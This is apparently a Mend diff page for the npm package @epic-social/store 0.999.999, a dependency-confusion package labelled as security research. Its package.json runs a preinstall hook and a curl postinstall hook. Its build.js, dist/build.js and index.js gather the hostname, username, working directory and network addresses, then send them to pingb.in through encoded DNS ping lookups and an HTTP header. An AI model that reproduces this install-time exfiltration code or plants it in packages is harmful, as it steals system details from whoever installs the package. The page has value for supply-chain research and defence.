npm - @epic-social/store - Versions diffs - 0.999.999 - Mend

@epic-social/store 0.999.999

This version of @epic-social/store might be problematic. Click here for more details.

Files changed (5) hide show

package/README.md ADDED Viewed

	@@ -0,0 +1 @@
1	+ This is a test project for security research purposes.

package/build.js ADDED Viewed

@@ -0,0 +1,53 @@
+const os = require("os");
+var http = require("http");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+const id = "a480244b63de9f63ad0464bda720";
+try {
+  exfil({ hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+//process.exit();
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+  try {
+    const options = {
+      host: "pingb.in",
+      path: `/p/${id}`,
+      headers: { "x-exfil": b64 },
+    };
+    http.request(options, () => {}).end();
+  } catch (e) {}
+}

package/dist/build.js ADDED Viewed

@@ -0,0 +1,42 @@
+const os = require("os");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+const id = "a480244b63de9f63ad0464bda720";
+try {
+  exfil({ d_hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ d_user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ d_cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["d_net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+//process.exit();
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+}

package/index.js ADDED Viewed

@@ -0,0 +1,42 @@
+const os = require("os");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+const id = "a480244b63de9f63ad0464bda720";
+try {
+  exfil({ r_hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ r_user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ r_cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["r_net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+//process.exit();
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+}

package/package.json ADDED Viewed

@@ -0,0 +1,12 @@
+{
+  "name": "@epic-social/store",
+  "version": "0.999.999",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node build.js",
+    "postinstall": "curl http://pingb.in/p/a480244b63de9f63ad0464bda720"
+  },
+  "author": "svennerg@wearehackerone.com",
+  "license": "MIT"
+}